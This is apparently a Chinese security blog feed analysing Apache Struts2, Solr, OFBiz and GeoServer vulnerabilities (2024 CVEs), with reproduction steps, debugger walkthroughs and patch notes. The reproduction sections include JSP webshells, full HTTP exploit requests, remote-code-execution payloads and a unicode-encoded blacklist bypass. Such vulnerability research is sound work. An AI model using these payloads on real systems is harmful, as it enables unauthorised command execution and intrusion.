中孚安全技术研究

Apache Struts2 文件上传漏洞分析（CVE-2024-53677）

Fri, 20 Dec 2024 19:30:00 +0800

元亨-blckder02 2024-12-20 19:30 浙江

Apache Struts 的文件上传逻辑存在缺陷，如果应用程序使用了 FileUploadInterceptor，在进行文件上传时，攻击者可以操纵文件上传参数来启用路径遍历，在某些情况下，这可能导致上传可用于执行远程代码执行的恶意文件。

1. 前言

官方公告:
https://cwiki.apache.org/confluence/display/WW/S2-067

漏洞描述：
Apache Struts 的文件上传逻辑存在缺陷，如果应用程序使用了 FileUploadInterceptor，在进行文件上传时，攻击者可以操纵文件上传参数来启用路径遍历，在某些情况下，这可能导致上传可用于执行远程代码执行的恶意文件。

影响版本：
Apache Struts：
    2.0.0 - 2.3.37（EOL）
    2.5.0 - 2.5.33
    6.0.0 - 6.3.0.2

2. 环境搭建

可以参考《Apache Struts2 文件上传漏洞分析（CVE-2023-50164）》

将 pom.xml 中 Struts2 的版本改为 6.3.0.2 即可。

<dependency>      <groupId>org.apache.strutsgroupId>      <artifactId>struts2-coreartifactId>      <version>6.3.0.2version>    dependency>

3. 漏洞复现

同样准备一个jsp木马文件。

<%Runtime.getRuntime().exec(request.getParameter("i"));%>

上传木马文件抓包，在下面添加一个参数，参数名设置为top.MyfileFileName，参数内容设置为木马文件保存的相对位置及文件名。

从响应包可以看到文件名覆盖成功。

请求包：

POST /upload.action HTTP/1.1            Host: 127.0.0.1:8888            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2            Accept-Encoding: gzip, deflate, br            Content-Type: multipart/form-data; boundary=---------------------------3701280597827013112747531662            Content-Length: 438            Origin: http://127.0.0.1:8888            Connection: keep-alive            Referer: http://127.0.0.1:8888/upload.action            Cookie: JSESSIONID=4209098B9C419F73225118698688A603            Upgrade-Insecure-Requests: 1            Priority: u=0, i                   -----------------------------3701280597827013112747531662            Content-Disposition: form-data; name="Myfile"; filename="S2-067.txt"            Content-Type: text/plain 
<%Runtime.getRuntime().exec(request.getParameter("i"));%>            -----------------------------3701280597827013112747531662            Content-Disposition: form-data; name="top.MyfileFileName";             Content-Type: text/plain           ../exec.jsp            -----------------------------3701280597827013112747531662--

文件保存到了/uploads目录下，且文件名保存为构造传入的exec.jsp。

访问jsp文件，能成功执行命令。

4. 漏洞分析

经过对 S66 漏洞的修复，已经不能再使用大小写来二次调用属性的 setter 方法了。学习了 y4tacker 师傅的思路，通过先获取 OgnlValueStack 值栈中的栈顶对象，再访问其属性。
有三种形式获取栈顶对象：[0]、top、[0].top

但是在参数绑定之前，会对参数进行合规校验，其中有条正则如下，要求(\[\d+])前面还需要存在一些其他字符，所以[0]和[0].top都无法通过参数合规性判断，所以只能使用top来获取栈顶对象。

\w+((\.\w+)|(\[\d+])|(\(\d+\))|(\['(\w-?|[\u4e00-\u9fa5]-?)+'])|(\('(\w-?|[\u4e00-\u9fa5]-?)+'\)))*

前面部分的参数处理就不细说了，再看下 S66 那篇分析就可以了。这里就只看一下如何处理的top节点。

从 ParametersInterceptor.setParameters() 看起，对 OgnlValueStack 对象进行参数绑定。
可以看到，TreeMap 对象中，top.MyfileFileName 参数是排在最后一位的，这时前面三个参数都已经绑定完成了，这时 MyfileFileName 参数的是S2-067.txt。

跟进到 OgnlUtil.compileAndExecute()，对 top.MyfileFileName 进行表达式解析并执行。（解析为链式节点ASTChain）

跟进到 ASTChain.setValueBody()，遍历处理子节点。

先获取 top 节点的值，到 CompoundRootAccessor.getProperty() 中有这样一段 if 判断，如果子节点为 top，root 不为空，就返回栈顶对象，即 UploadAction。

接着就是为 UploadAction 对象的 MyfileFileName 属性设置值，ObjectPropertyAccessor.setPossibleProperty() 中尝试去调用 setter 方法。

ConcurrentHashMap.get()，从缓存中先获取到 UploadAction 的所有 setter 方法，再从中获取 setMyfileFileName() 并返回。

接着调用 setMyfileFileName()。

myfieFileName 被覆盖为../exec.jsp，后续解析路径穿越符，于是上传保存的文件路径就是/uploads/exec.jsp。

5. 补丁分析

官方并没有针对这次利用方法发布补丁，而是在新版本中推出了新的文件上传拦截机制。
org.apache.struts2.interceptor.ActionFileUploadInterceptor
https://struts.apache.org/core-developers/action-file-upload

ActionFileUploadInterceptor 中直接从文件中获取参数信息，并没有把文件参数与请求中的参数进行合并。

不过在执行 ActionFileUploadInterceptor 拦截器前，先执行了 FileUploadInterceptor，所以请求中构造的 top.MyfileFileName 还是被合并到了参数中。

在参数绑定过程中仍然会覆盖 MyfileFileName 的值。

参考链接：https://y4tacker.github.io/2024/12/16/year/2024/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87-CVE-2024-53677-S2-067/

阅读原文

跳转微信打开

Apache Solr 身份验证绕过漏洞分析（CVE-2024-45216）

Tue, 17 Dec 2024 12:00:00 +0800

原创元亨-blckder02 2024-12-17 12:00 浙江

Apache Solr 中存在不正确的身份验证漏洞。使用 PKIAuthenticationPlugin 的 Solr 实例容易受到身份验证绕过的影响。

1. 前言

官方公告：
https://solr.apache.org/security.html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending
https://issues.apache.org/jira/browse/SOLR-17417

漏洞描述：
Apache Solr 中存在不正确的身份验证漏洞。使用 PKIAuthenticationPlugin 的 Solr 实例（在使用 Solr 身份验证时默认启用）容易受到身份验证绕过的影响。任何 Solr API URL 路径末尾的假结尾将允许请求跳过身份验证，同时保持与原始 URL 路径的 API 契约。这个假结尾看起来像一个不受保护的 API 路径，但它在身份验证之后但在 API 路由之前在内部被剥离。

影响版本：
Apache Solr 5.3.0 ~ 8.11.4 之前版本
Apache Solr 9.0.0 ~ 9.7.0 之前版本

2. 环境搭建

9.x.x 版本下载地址：https://archive.apache.org/dist/solr/solr/
8.x.x 及以前版本下载地址：https://archive.apache.org/dist/lucene/solr/

官方教程文档：https://solr.apache.org/guide/8_11/

本次复现使用 Apahce solr 8.11.3，jdk 11.0.16。

在bin目录下运行以下命令即可启动或停止 solr，-c是以 SolrCloud 模式启动solr，-p指定启动端口：

solr -p 8983      #启动            solr stop -p 8983       #停止            solr -c -p 8983     #以 SolrCloud 模式启动            solr -c -p 8983 -a "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005"       #启动并开启远程调试

浏览器访问 http://localhost:8983/solr/ ，solr 成功运行。

这个时候访问/solr/admin/info/properties，不需要登录，会显示配置信息。

要还原漏洞环境，我们需要自己配置身份验证和授权。Solr 所有身份验证、授权和审计日志插件等相关配置（包括用户和权限规则）都存储在 security.json 文件中，在 SolrCloud 模式中需要将 security.json 上传至 ZooKeeper。如果本地没有搭建 ZooKeeper 服务，可以使用 Solr 自带的嵌入式 ZooKeeper，默认端口为 9983。

自定义一个 security.json ，这里直接使用官方提供的配置。
authentication 为认证部分：
    - blockUnknown 为 true，未经认证的请求不允许通过；
    - 指定 solr.BasicAuthPlugin 插件类为solr提供身份验证；
    - 定义用户名为 solr 的用户，密码通过加密存储。

authorization 为授权部分：
- 指定 solr.RuleBasedAuthorizationPlugin 插件类为 solr 提供授权；

- permissions 定义操作权限，权限名称为 security-edit，表示允许编辑安全配置。拥有该权限的角色是 admin；
- 定义用户与角色的映射关系，表示 solr 用户拥有 admin角色的权限。

{            "authentication":{               "blockUnknown": true,               "class":"solr.BasicAuthPlugin",               "credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="},            },            "authorization":{               "class":"solr.RuleBasedAuthorizationPlugin",               "permissions":[{"name":"security-edit",                  "role":"admin"}],               "user-role":{"solr":"admin"}                }            }

先以 SolrCloud 模式启动 Solr，执行下面的命令将自定义的 security.json 文件上传到 ZooKeeper。

solr zk cp -z localhost:9983 file:security.json zk:/security.json

上传成功后重新启动 Solr，身份验证生效，访问主页和 /solr/admin/info/properties 就需要登录了。

这样漏洞环境就搭好了。

3. 漏洞复现

在未登录的情况下访问/solr/admin/info/properties会返回401。

在 url 后面添加:/admin/info/key，向请求头中添加SolrAuth头，即可绕过身份验证，成功返回配置信息。

4. 漏洞分析

IDEA中添加配置，开始调试。

先看看未登录情况下的身份认证流程。
在 SolrDispatchFilter.doFilter() 断点，调用 authenticateRequest() 进行身份认证，如果返回 true，则说明认证通过。

跟进 authenticateRequest()，获取到认证插件为 security.json 中指定的 BasicAuthPlugin。
下面对请求路径进行判断，如果路径匹配/admin/info/key，则直接返回 true 。
如果请求头中含有 SolrAuth 或 SolrAuthV2，则采用 PKIAuthenticationPlugin 认证插件。
这些条件都不满足，调用当前 BasicAuthPlugin 插件的 authenticate() 方法进行认证，如果认证通过，则将 isAuthenticated 设为 true，返回认证成功的结果。

跟进到 BasicAuthPlugin.doAuthenticate()，判断了请求头中的 Authorization 字段，由于我们并没有登录信息，所以认证不通过，返回 false。

再来看看绕过后的认证流程。
同样进入到 SolrDispatchFilter.authenticateRequest()，这时请求头中含有 SolrAuth 字段，所以认证插件采用 PKIAuthenticationPlugin。

跟进到 PKIAuthenticationPlugin.doAuthenticate() 进行认证，这里直接通过判断 URI 只要以/admin/info/key结尾就返回 true，所以成功通过 PKIAuthenticationPlugin 插件的认证。

SolrDispatchFilter.authenticateRequest() 也返回 true。

继续跟进到 HttpSolrCall.init()，这里判断了路径中是否含有:号，有的话就只保留:号前的部分，于是 path 就变成了/admin/info/properties，这样就能获取到其对应的处理器。
处理器不为 null，就给 HttpSolrCall 对象的 requestType 赋值为 RequestType.ADMIN，给 action 赋值为 Action.ADMIN，表示授予 admin 角色权限。

接着进入 HttpSolrCall.authorize()，调用 RuleBasedAuthorizationPluginBase.authorize() 进行授权，因为上面将 requestType 赋值为了 RequestType.ADMIN，所以这里进入 if 分支。mapping 是 security.json 中授予 admin 角色 security-edit 允许编辑安全配置的权限。

跟进 checkCollPerm()，mapping 中没有找到/admin/info/properties的授权规则，继续跟进 checkPathPerm()，返回 NO_PERMISSIONS_FOUND 标识。

接着获取了默认权限列表{"name":"security-edit","role":"admin"}，继续检查权限列表是否适用与当前请求。

遍历权限列表，到 predefinedPermissionAppliesToRequest()，context.getHandler() 不是 PermissionNameProvider 类型，不适用于当前权限，返回 false。

最后还是返回 NO_PERMISSIONS_FOUND 标识，状态码为 200。

HttpSolrCall.authorize() 返回 null，表示授权成功，继续处理流程。

5. 补丁分析

在 8.11.4 版本中，将 PKIAuthenticationPlugin.doAuthenticate() 中判断路径是否以/admin/info/key结尾的代码删掉了，所以当使用 PKIAuthenticationPlugin 插件进行身份认证时，这一步不会返回 true，也就无法再利用/admin/info/key结尾来绕过身份认证。

HttpSolrCall.init() 中截取:号前路径的代码也被删除了，URL路径假结尾无法被剥离，就无法获取到正确的处理器，不会进入下面的 if 分支，就无法被授予 ADMIN 角色权限。

阅读原文

跳转微信打开

Apache OFBiz 命令执行漏洞分析（CVE-2024-45195、CVE-2024-45507）

Wed, 13 Nov 2024 17:31:00 +0800

原创元亨-blckder02 2024-11-13 17:31 浙江

CVE-2024-45195：通过目录遍历可以绕过授权验证实现命令执行。

CVE-2024-45507：由于Apache OFBiz在从 Groovy 加载文件时对URL 的验证不足，导致远程攻击者可以通过SSRF的方式向任意系统发起请求。

1. 环境搭建

下载地址：https://archive.apache.org/dist/ofbiz/

解压后用 IDEA 打开，点击右侧栏 Gradle 中的 build 之后会生成一个 biuld 目录，该目录下面会生成一个 ofbiz.jar，Run/Debug Configurations 中会自动生成一个 Gradle 配置项；

新增 JAR Application，添加指定 ofbiz.jar 路径。

启动这个jar。

能成功访问 https://localhost:8443/webtools 就说明环境搭好了。

2. CVE-2024-45195

2-1. 前言

官方公告：

https://issues.apache.org/jira/browse/OFBIZ-13130

https://lists.apache.org/thread/o90dd9lbk1hh3t2557t2y2qvrh92p7wy

漏洞描述：

通过目录遍历可以绕过授权验证实现命令执行。

影响版本：

Apache OFBiz < 18.12.16

2-2. 漏洞复现

rceschema.xml:

http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

rcereport.csv:

<% Runtime.getRuntime().exec(request.getParameter("cmd"));%>

起一个http服务，将这两个文件放到目录下。

python -m http.server 8888

请求包：

POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1              Host: 127.0.0.1:8443              Cookie: OFBiz.Visitor=10100              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8              Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2              Accept-Encoding: gzip, deflate, br              Upgrade-Insecure-Requests: 1              Sec-Fetch-Dest: document              Sec-Fetch-Mode: navigate              Sec-Fetch-Site: none              Sec-Fetch-User: ?1              Priority: u=0, i              Te: trailers              Connection: keep-alive              Content-Type: application/x-www-form-urlencoded              Content-Length: 241              
DATAFILE_LOCATION=http://127.0.0.1:8888/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://127.0.0.1:8888/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce

访问 https://127.0.0.1:8443/accounting/index.jsp?cmd=calc，成功执行命令。

2-3. 漏洞分析

权限绕过的原理和之前一样，通过不需要鉴权的路由来绕过。触发命令执行的文件不同，之前利用的是 ProgramExport.groovy，现在利用 ViewDataFile.groovy 。

在 controller.xml 中定义了路由/viewdatafile，security.auth为true，直接访问需要权限。视图指向component://webtools/widget/MiscScreens.xml#viewdatafile，会调用 ViewDataFile.groovy 脚本。

解读一下 ViewDataFile.groovy 的作用：

1.从请求中获取多个参数的值；

2. DATAFILE_IS_URL 和 DEFINITION_IS_URL 的值表示 DATAFILE_LOCATION 和 DEFINITION_LOCATION 是否为一个 URL，为 ture 则直接创建URL对象，为 false 则将文件路径转换为 URL。

3. 从 DEFINITION_LOCATION 的 URL 地址获取文件中定义的数据文件的名称列表。满足 dataFileUrl && definitionUrl && definitionNames 为 true，则根据定义文件 DEFINITION_LOCATION 的内容和 DEFINITION_NAME 名称，从 DATAFILE_LOCATION 地址读取数据文件内容。

4. 将上面读取到的数据文件内容写入 DATAFILE_SAVE 指定的文件。

也就是说，该文件实现了一个数据读取和写入的功能，并且能解析 JSP 文件，也就是能通过写入JSP shell 来实现命令执行。

定义文件的格式在

《OFBiz 的数据文件工具》‍
https://cwiki.apache.org/confluence/display/OFBIZ/OFBiz%27s+Data+File+Tools

中有介绍，通过 xml 格式来定义要写入的数据文件的信息。

xml 文件中 data-file.name 表示数据文件名称（并非文件名），需与 POST 传入的 DEFINITION_NAME 的值一致，record.name 表示实体名称。field.name 表示实体字段的名称，也就是指向 DATAFILE_LOCATION 文件，读取数据文件后会使用该名称以键值对的形式保存。field.type 表示数据类型，field.length 表示字段的长度，需与实际数据长度一致，field.position 表示该字段开始读取的位置。

调试看看，简单过一下权限绕过和视图解析的几个点。

进入 ViewDataFile.groovy，获取了前端传入的参数，dataFileSave 为数据文件写入的文件路径，dataFileLoc 为数据文件的 URL 地址，definitionLoc 为xml定义文件的URL地址，definitionName 为定义文件中定义的名称。

dataFileIsUrl 和definitionIsUrl 为true，表示文件地址为URL格式，所以 dataFileUrl 和 definitionUrl 分别为数据文件和定义文件的URL对象。

跟进 ModelDataFileReader.getModelDataFileReader()，要 new 一个 ModelDataFileReader 对象，在 createModelDataFiles() 中去读取并解析远程的xml文件，返回 ModelDataFileReader 对象，并从中获取数据文件名称。

接着跟进 DataFile.readFile()，同样调用了 ModelDataFileReader.getModelDataFileReader()，从中获取与 dataFileName 对应的 ModelDataFile 对象，包装成 DataFile 对象返回，其中包含了数据文件的结构信息。

然后调用 dataFile.readDataFile(fileUrl)，逐行读取远程数据文件的内容，以键值对的形式保存到 DataFile 对象的实体字段中。

最后就是调用 dataFile.writeDataFile(dataFileSave)，将 DataFile 对象中保存的数据文件内容写入到指定的文件中。

当从前端访问该 jsp 文件时，就会解析内容，实现命令执行。

3. CVE-2024-45507

3-1. 前言

官方公告：

https://issues.apache.org/jira/browse/OFBIZ-13132

https://lists.apache.org/thread/o90dd9lbk1hh3t2557t2y2qvrh92p7wy

漏洞描述：

由于Apache OFBiz在从 Groovy 加载文件时对 URL 的验证不足，导致远程攻击者可以通过服务器端请求伪造的方式向任意系统发起请求，并可能导致远程代码执行，成功利用此漏洞可能允许攻击者完全控制受影响的系统，包括访问敏感数据、执行任意命令或进行进一步的网络攻击。

影响版本：

Apache OFBiz < 18.12.16

3-2. 漏洞复现

写一个屏幕定义文件 ssrfpoc.xml，value 设为一段 groovy 表达式来执行命令:

<screens xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"        xmlns="http://ofbiz.apache.org/Widget-Screen" xsi:schemaLocation="http://ofbiz.apache.org/Widget-Screen http://ofbiz.apache.org/dtds/widget-screen.xsd">
    <screen name="StatsDecorator">        <section>            <actions>                <set field="headerItem" value="${groovy:throw new Exception('cmd /c start calc'.execute().text);}"/>                <entity-one entity-name="FinAccount" value-field="finAccount"/>            actions>        section>    screen>
screens>

向/webtools/control/forgotPassword/StatsSinceStart传递定义文件。

POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1Host: 127.0.0.1:8443Cookie: OFBiz.Visitor=10100User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 56
statsDecoratorLocation=http://127.0.0.1:8888/ssrfpoc.xml

执行命令。

3-3. 漏洞分析

在 controller.xml 中定义了路由 /StatsSinceStart，security.auth 为 true，直接访问需要权限。视图指向component://webtools/widget/StatsScreens.xml#StatsSinceStart，会调用 StatsSinceStart.groovy 脚本，但是这里没有可利用的点。

在 StatsSinceStart.xml 的标签下名为 StatsDecorator 装饰器屏幕的定义中，${parameters.statsDecoratorLocation} 是前端可控的，允许从远程加载屏幕定义文件。

读取 StatsScreens.xml 文件，逐层解析标签到 StatsDecorator 装饰器，从前端 statsDecoratorLocation 参数获取到远程 StatsDecorator 定义文件的地址。

从远程地址获取到名为 StatsDecorator 的屏幕定义内容。

也是逐层解析标签，然后执行并解析this.valueExdr表达式。

跟进创建 groovy 脚本实例，绑定了上下文数据。

run() 执行该脚本，调用 ProcessGroovyMethods.execute() 执行系统命令。

4. 补丁分析

18.12.16 版本，在进行视图解析的 RequestHandler.renderView() 中，添加了一段对当前要访问的视图进行权限检查的代码。

当满足 viewMap.securityAuth 为true，且当前为未登录状态时，就会进入if分支，进行登录校验，登录失败则抛出异常，停止视图解析。

参考链接：

https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/

https://forum.butian.net/article/586

https://xz.aliyun.com/t/15569

阅读原文

跳转微信打开

GeoServer 远程代码执行漏洞分析 (CVE-2024-36401)

Fri, 12 Jul 2024 18:34:00 +0800

元亨-blckder02 2024-07-12 18:34 浙江

由于不安全地将属性名称评估为 XPath 表达式，多个 OGC 请求参数允许未经身份验证的用户通过针对默认 GeoServer 安装的特制输入进行远程代码执行 (RCE)。

一、前言

官方公告：
https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv

https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w

漏洞描述：

由于不安全地将属性名称评估为 XPath 表达式，多个 OGC 请求参数允许未经身份验证的用户通过针对默认 GeoServer 安装的特制输入进行远程代码执行 (RCE)。
GeoServer 调用的 GeoTools 库 API 会以不安全的方式将要素类型的属性名称传递给 commons-jxpath 库，该库在评估 XPath 表达式时可以执行任意代码。此 XPath 评估仅供复杂要素类型（即应用程序架构数据存储）使用，但也被错误地应用于简单要素类型，这使得此漏洞适用于所有GeoServer 实例。

影响版本：
GeoServer：
    < 2.23.6
    >= 2.24.0, < 2.24.4
    >= 2.25.0, < 2.25.2

二、环境搭建

源码下载：https://github.com/geoserver/geoserver/archive/refs/tags/2.23.5.zip
war下载：https://sourceforge.net/projects/geoserver/files/GeoServer/2.23.5/geoserver-2.23.5-war.zip/download

配置好 Tomcat 和 debug 。

启动 Tomcat，访问http://127.0.0.1:8080/geoserver/web，可以看到自带的图层数据，环境搭建成功。

三、漏洞复现

使用 GetPropertyValue 进行复现，POC：

service=wfs&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'calc.exe')

或者：

POST /geoserver/wfs HTTP/1.1            Host: 127.0.0.1:8080            Content-Type: application/xml                                               xmlns:topp='http://www.openplans.org/topp'xmlns:fes='http://www.opengis.net/fes/2.0'xmlns:wfs='http://www.opengis.net/wfs/2.0'valueReference='exec(java.lang.Runtime.getRuntime(),"calc.exe")'>

四. 漏洞分析

在第一个漏洞公告中已经说明了可以通过WFS GetFeature、WFS GetPropertyValue、WMS GetMap、WMS GetFeatureInfo、WMS GetLegendGraphic 和 WPS Execute 请求利用此漏洞。
这些操作在《WFS参考》文档中可以找到使用方法，本文复现使用的操作为 GetPropertyValue，作用如下：

https://www.osgeo.cn/geoserver-user-manual/services/wfs/reference.html

就是从 typeNames 指定的图层中检索 valueReference 属性的值。GeoServer 调用的 GeoTools 库 API 会以不安全的方式将该属性传递给 commons-jxpath 库，该库在评估 XPath 表达式时就导致任意代码执行。

跟踪调试，从 Dispatcher.handleRequestInternal() 方法看起，处理请求逻辑。

跟进 findService() 方法，看到根据 id 和 version 选出了符合条件的 Service 对象。

在 parseRequestKVP() 方法中，从 request 中获取了参数键值对，保存为 GetPropertyValueTypeImpl 对象。

然后执行请求。

反射调用 getPropertyValue() 方法。

跳到 DefaultWebFeatureService20.getPropertyValue()，实例化了一个 GetPropertyValue 对象，接着调用 GetPropertyValue.run()。

跟进 FilterFactoryImpl.property()，实例化了一个 AttributeExpressionImpl 对象，将前端传入的 valueReference 参数值赋给了this.attPath。

propertyName和propertyNameNoIndexes都为 AttributeExpressionImpl 对象，调用 evaluate() 评估属性描述符，也就是评估这个 XPath 表达式，符合漏洞描述中所说的。

跟进，调用 PropertyAccessors.findPropertyAccessors()，遍历找到可以处理当前评估操作的 PropertyAccessor 对象，获取到 FeaturePropertyAccessorFactory，正是第二个漏洞公告中提到的利用方法。

然后调用 FeaturePropertyAccessorFactory.get()，传入this.attPath作为 XPath 表达式。this.attPath是前端传入的valueReference参数的值，也就是说这个位置的 XPath 表达式可控。

跟进，向context中注册了命名空间的名称及uri，然后迭代 XPath 指针。

编译表达式，调用 compute() 进行计算。

将this.args的计算转换后结果保存到parameters中，包含一个 Runtime对象和calc.exe字符串；

然后获取到exec()方法，调用该方法执行命令。

本文就简单跟踪一下命令执行的过程，更多细节及利用方式可参考：

https://xz.aliyun.com/t/14991

https://y4tacker.github.io/2024/07/03/year/2024/7/%E6%B5%85%E6%9E%90GeoServer-property-%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C-CVE-2024-36401/

https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247484076&idx=1&sn=4064cb6a006f5cc454b7fb982e8ab9c6

阅读原文

跳转微信打开

Apache OFBiz 命令执行漏洞分析（CVE-2024-32113、CVE-2024-36104）

Fri, 21 Jun 2024 17:33:00 +0800

原创元亨-blckder02 2024-06-21 17:33 浙江

通过目录遍历可以绕过授权验证实现命令执行。

1.前言

官方公告：
https://issues.apache.org/jira/browse/OFBIZ-13006
https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd
https://issues.apache.org/jira/browse/OFBIZ-13092
https://lists.apache.org/thread/sv0xr8b1j7mmh5p37yldy9vmnzbodz2o

漏洞描述：

通过目录遍历可以绕过授权验证实现命令执行。

影响版本：

CVE-2024-32113:
Apache OfBiz < 18.12.13
CVE-2024-36104:
Apache OfBiz < 18.12.14

2. 环境搭建

下载地址：https://archive.apache.org/dist/ofbiz/

解压后用 IDEA 打开，点击右侧栏 Gradle 中的 build 之后会生成一个 biuld 目录，该目录下面会生成一个ofbiz.jar，Run/Debug Configurations 中会自动生成一个 Gradle 配置项；
新增JAR Application，添加指定ofbiz.jar路径。

启动这个jar。

能成功访问https://localhost:8443/webtools就说明环境搭好了。

3. 漏洞复现

在调试分析的过程中发现，导致命令执行的关键原理跟目录遍历并没有绝对关系，与其说这是目录遍历导致的代码执行，不如说是授权检查绕过。

基于 CVE-2024-51467 修复授权检查绕过的方法是修改 LoginWorker.checkLogin() 登录校验方法的返回逻辑，所以不能再通过传参来绕过授权检查。

但是仍然可以从securityAuth入手，以不需要身份验证的 uri 为跳板来调用/ProgramExport对应的视图。

（详情可回顾：Apache OFBiz 命令执行漏洞分析）

直接构造 18.12.14 及之前版本通杀的路径 payload，不需要进行目录遍历。

/webtools/control/ListTimezones/ProgramExport?groovyProgram='calc.exe'.execute()

其中/ListTimezones部分是可替换的，在 common-comtroller.xml 中，只要满足auth="false"、以及success响应结果对应type="view"的 uri 都可以进行利用。比如这些：forgotPassword、ListSetCompanies、showHelpPublic、getUiLabels、ListTimezones、ListLocales。

18.12.13 版本中，在 security.properties 中的黑名单里新增了execute等关键字；

所以 18.12.13 和 18.12.14 版本的 payload 需要对 groovyProgram 参数内容进行编码传入来绕过黑名单校验。

/webtools/control/ListSetCompanies/ProgramExport            
groovyProgram=\u0027\u0063\u0061\u006c\u0063\u002e\u0065\u0078\u0065\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029

uri ListTimezones的 auth 改为了 true，不能进行利用了，不过其他的 uri 仍然可以利用。

4. 漏洞分析

接下来以 18.12.12 版本为例分析看看，如果请求的路径为/webtools/control/ListTimezones/./ProgramExport，在 ControlFilter.doFilter() 中，getRequestURI() 首先获取到的是/control/ListTimezones/./ProgramExport，经过规范化后去除了其中的.，变成了/control/ListTimezones/ProgramExport。

所以特殊符号在这一步都会被过滤掉，18.12.13 以及 18.12.14 版本的补丁都在围绕这一块代码进行修改补充，不过这并不是关键所在。

接着断点 ControlServlet.doGet()，这时 request 中的路径就为/webtools/control/ListSetCompanies/ProgramExport。

跟进 RequestHandler.doRequest()，看获取到的几个路径参数，path 为/ListSetCompanies/ProgramExport，requestUri 取的是 path 的第一部分ListSetCompanies，overrideViewUri 取的是路径的第二部分ProgramExport，如果没有就为 null；

rmaps 为ListSetCompanies对应的 requestMap，其中 securityAuth 属性为 false。

继续向下看，到判断 securityAuth 的值，为 false 则不进入 if 分支，也就不会调用 LoginWorker.checkLogin() 进行登录验证。

获取 requestMap 中 success 的响应数据，然后赋给 nextRequestResponse，其中 type 为view，下面进入 view 的分支；
此时 eventReturn 的值是 null，740 行的逻辑表达式为 true，视图名称得到 overrideViewUri 的值ProgramExport，关键就在这里，将路径的第二部分作为视图名称赋值，后面就是进行视图渲染。

获取传入的 groovyProgram 参数值，从 \framework\webtools\webapp\webtools\WEB-INF\controller.xml 中找到 ProgramExport 的视图信息定义在 component://webtools/widget/EntityScreens.xml#ProgramExport 文件中。

获取到 screen 类型的视图处理器。

一直跟进，从 EntityScreens.xml 中获取到了ProgramExport对应的脚本文件位置 component://webtools/groovyScripts/entity/ProgramExport.groovy ，当遍历到此文件时跟进。

检测到.groovy后缀，进入 ProgramExport.groovy 文件，执行 groovyProgram 参数的命令。

5. 补丁分析

18.12.13版本：
主要体现在将ListTimezones的 auth 改为 true，黑名单里增加execute关键字，ControlFilter.doFilter() 中校验了规范化前后的 url 是否一致，以此来判断 url 是否含有特殊字符。

18.12.14版本：
网上使用的 payload 是将.换为%2e或;来绕过 18.12.13 版本的修复代码，于是官方在 18.12.14 版本的 ControlFilter.doFilter() 中添加过滤了%2e和;，不过仍然没有修复到问题关键。

阅读原文

跳转微信打开

攻防演练场景下的漏洞挖掘与治理 | 安全范儿沙龙开启

Wed, 19 Jun 2024 17:09:00 +0800

“安全范儿”沙龙 2024-06-19 17:09 浙江

攻防演练场景下的漏洞挖掘与治理 | 安全范儿沙龙开启

6.21

安全范儿

距离第14期“安全范儿”技术沙龙还有1天

Hi，安全范儿沙龙！-漏洞挖掘与治理篇

发现安全漏洞并进行高效治理是企业安全建设中的重要环节，本期沙龙嘉宾将结合真实情景，分享漏洞挖掘思路与技巧以及不同视角下如何开展高效治理。

错过本次沙龙，你可能会错过

抖音电商特有风险介绍及治理

字节内部漏洞治理流程和经验

HW筹备之蓝军攻击技法

云上多场景容器逃逸/接管

6.21

安全范儿

SECURITY

硬核议题，一睹为快

抖音电商的漏洞发现与治理实践

分享人：张义抖音电商安全蓝军

｜主要从事抖音电商业务线的漏洞攻防工作

